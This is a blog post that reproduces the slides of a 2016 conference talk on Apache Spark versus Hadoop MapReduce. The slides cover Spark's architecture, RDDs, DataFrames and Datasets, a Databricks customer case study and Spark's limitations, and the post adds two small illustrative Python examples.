Corinium Blog

Chief Analytics Officer, Canada 2016 - Nitin Mathur - Accelerating innovation with Spark and Hadoop – Harnessing the convergence of data and analytics

Written by Corinium on 15 February 2017

1. Nitin Mathur, Director – Hadoop COE, Scotiabank
2. Agenda
• Spark Overview
• High Level Architecture
• Hadoop MapReduce vs. Spark
• Use Cases for Spark
• Spark Limitations
• Q&A
3. History of Data Storage…
• Data Storage on Punch Card
• Drum & Tape Storage
• Hard Drive
• Low Cost Disk Storage
• Cheap Memory
4. Business Wants Data-Driven Real-Time Analytics
• Predict Product Revenue
• Customer Assessment
• Targeted Advertising
• Fraud Detection
• Risk Assessment
• Data-driven medicine: a system built at Toronto’s Sick Kids hospital monitors newborns and predicts dangerous infections 24 hours earlier than traditional visual methods.
5. Spark – Overview
• Developed at the University of California, Berkeley’s AMPLab. It is an open source cluster computing framework, developed in response to the limitations of the MapReduce computing paradigm.
• Enables low latency with complex analytics.
• Fast, distributed, scalable and fault-tolerant cluster compute system.
6. Spark – In Memory Magic
• Spark is up to 100x faster in memory than Hadoop MapReduce on disk.
• Write 2-5x less code.
• Provides fault-tolerant distributed datasets.
• Integrates with most file and storage options.
• Provides capability for both batch and streaming analysis.
7. Spark – Architecture Overview
• Spark Core Engine
• Spark Streaming: Streaming
• MLlib: Machine Learning
• Spark SQL: SQL
• GraphX: Graph Computation
• SparkR: R on Spark
• Spark Standalone
8. Spark - Resilient Distributed Dataset (RDD)
• Built for fault tolerance: an RDD can be recalculated from any point of failure.
• Created through transformations on data (map, filter, ...) or on other RDDs.
• Immutable
• Can be reused
• Partitioned
9. Spark – RDD
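The RDD properties listed above (immutable, created through transformations, recomputable after a failure) can be illustrated with a small toy model. This is a minimal sketch in plain Python and is not the Spark API: the class `ToyRDD` and its `lose_cache` method are hypothetical names invented for this illustration, and partitioning is left out entirely.

```python
from typing import Callable, Iterable, List, Optional


class ToyRDD:
    """Toy stand-in for an RDD (hypothetical, NOT the Spark API).

    Each instance remembers its parent and the operation that derives it,
    so its contents can always be rebuilt from that lineage.
    """

    def __init__(self,
                 source: Optional[List[int]] = None,
                 parent: Optional["ToyRDD"] = None,
                 op: Optional[Callable[[Iterable], Iterable]] = None):
        # A tuple keeps the source data immutable.
        self._source = tuple(source) if source is not None else None
        self._parent = parent
        self._op = op
        self._cache: Optional[list] = None  # in-memory copy of the result

    def map(self, fn: Callable) -> "ToyRDD":
        # A transformation returns a NEW dataset; the parent is unchanged.
        return ToyRDD(parent=self, op=lambda rows: (fn(r) for r in rows))

    def filter(self, pred: Callable) -> "ToyRDD":
        return ToyRDD(parent=self, op=lambda rows: (r for r in rows if pred(r)))

    def collect(self) -> list:
        # Compute on demand, walking back through the lineage if needed.
        if self._cache is None:
            if self._parent is None:
                self._cache = list(self._source)
            else:
                self._cache = list(self._op(self._parent.collect()))
        return list(self._cache)

    def lose_cache(self) -> None:
        # Simulates losing the in-memory result, e.g. after a node failure.
        self._cache = None


numbers = ToyRDD(source=[1, 2, 3, 4, 5, 6])
evens_squared = numbers.filter(lambda x: x % 2 == 0).map(lambda x: x * x)
first_result = evens_squared.collect()

evens_squared.lose_cache()                 # simulated failure
recomputed = evens_squared.collect()       # rebuilt from lineage
```

In this sketch the recomputed result matches the first one because every derived dataset can be rebuilt from its parent and its operation, and the original `numbers` dataset is never modified by the transformations applied to it.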
10. RDD to DataFrame to Dataset
RDD
• Type Safe
• High memory usage
• Serialization – Java or Kryo
• Scala, Java and Python
DataFrame
• Supports more Data Formats and Sources
• Intelligent Optimization and Code Generation
• The Catalyst optimizer
• Tungsten execution engine
• Scala, Java and Python
• R (in development via SparkR)
Dataset
• Type Safe
• RDD + DataFrame
• Lower memory usage
• Lightning-fast Serialization with Encoders
• Only for Scala and Java
11. Spark vs. Hadoop
Spark
• New and evolving.
• Keeps the data in memory and only goes to disk when needed. It also keeps the data in memory between the Map and Reduce phases. Performance boost of 10x-100x.
• Unlike Hadoop, Spark can be run in a variety of modes: standalone, Apache Mesos, Hadoop YARN, and in the cloud.
• Less coding compared to Hadoop.
• Ease of use: develop applications quickly in Java, Scala, Python and R. Offers over 80 high-level operators that make it easy to build parallel apps. Use it interactively from the Scala, Python and R shells.
Hadoop
• Mature, with new features and capabilities that make it easier to set up and use.
• Hadoop's promise is to boost performance by moving the processing closer to the data. It processes data on disk.
• Works on HDFS.
• More coding.
• Can’t be changed interactively.
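The Map and Reduce phases mentioned in the comparison above can be made concrete with a word count, the usual introductory MapReduce example. The following is a minimal sketch in plain Python that runs in a single process; it uses neither Hadoop nor Spark, and the function names (`map_phase`, `shuffle_phase`, `reduce_phase`, `word_count`) are hypothetical names chosen for this illustration.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple


def map_phase(lines: Iterable[str]) -> List[Tuple[str, int]]:
    # Map: emit a (word, 1) pair for every word in every line.
    return [(word.lower(), 1) for line in lines for word in line.split()]


def shuffle_phase(pairs: Iterable[Tuple[str, int]]) -> Dict[str, List[int]]:
    # Shuffle: group all emitted values by key.
    groups: Dict[str, List[int]] = defaultdict(list)
    for key, value in pairs:
        groups[key].append(value)
    return dict(groups)


def reduce_phase(groups: Dict[str, List[int]]) -> Dict[str, int]:
    # Reduce: collapse each group of values into a single count.
    return {key: sum(values) for key, values in groups.items()}


def word_count(lines: Iterable[str]) -> Dict[str, int]:
    # The intermediate results stay in memory between the phases here.
    return reduce_phase(shuffle_phase(map_phase(lines)))


counts = word_count(["spark and hadoop", "Spark in memory"])
```

In this toy version the intermediate pairs are ordinary in-memory Python objects handed from one phase to the next. The slide's point is that Hadoop MapReduce processes data on disk, whereas Spark keeps the data in memory between the phases.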
12. Spark – Use Cases
13. Spark – Case Study
Databricks Case Study
CEO - Matei Zaharia (CTO)
Customer - Eyeview
Business Problem:
• With data volumes exceeding a total of 100TB and a data ingest rate of 1.5TB per day, Eyeview began to see performance problems that impacted its ability to mine the data efficiently.
• A 30-day look-back query across all the user segments often required several hours, which was not acceptable for its business needs.
• The legacy system was rigid and could not scale on demand.
• Data scientists and engineers were spending a significant amount of time on DevOps duties.
Solution:
Hosted in the cloud (AWS), Databricks provided Eyeview with an unparalleled level of flexibility and performance. Through Databricks’ interactive notebooks and Spark engine, Eyeview can quickly and easily explore and visualize its data, reducing the time to insights delivered.
Outcome:
• Reduced query times on large data sets by a factor of 10, allowing data analysts to regain 20 percent of their workday from waiting for results.
• Sped up data processing fourfold without incurring additional operational costs.
• Team members with limited big data expertise can easily utilize Spark clusters without the need for DevOps.
• Fully managed Spark clusters can be spun up or down on demand with a few clicks.
Source: https://databricks.com/resources/case-studies
14. Spark – When Not to Use Spark
• Not fit for a multi-user environment: adding more users complicates matters, since the users have to coordinate memory usage to run projects concurrently.
• Working with small data sets.
15. Spark – Key Takeaways
• In Memory Magic.
• Up to 100x faster in memory than Hadoop MapReduce on disk.
• Write 2-5x less code.
• Spark can be run in a variety of modes: standalone, Apache Mesos, Hadoop YARN.
• Spark provides capability for Real Time and Batch Analytics.
• Moving from RDD to DataFrame to Dataset.

Topics: Presentation, CAO, Data, Data Analytics
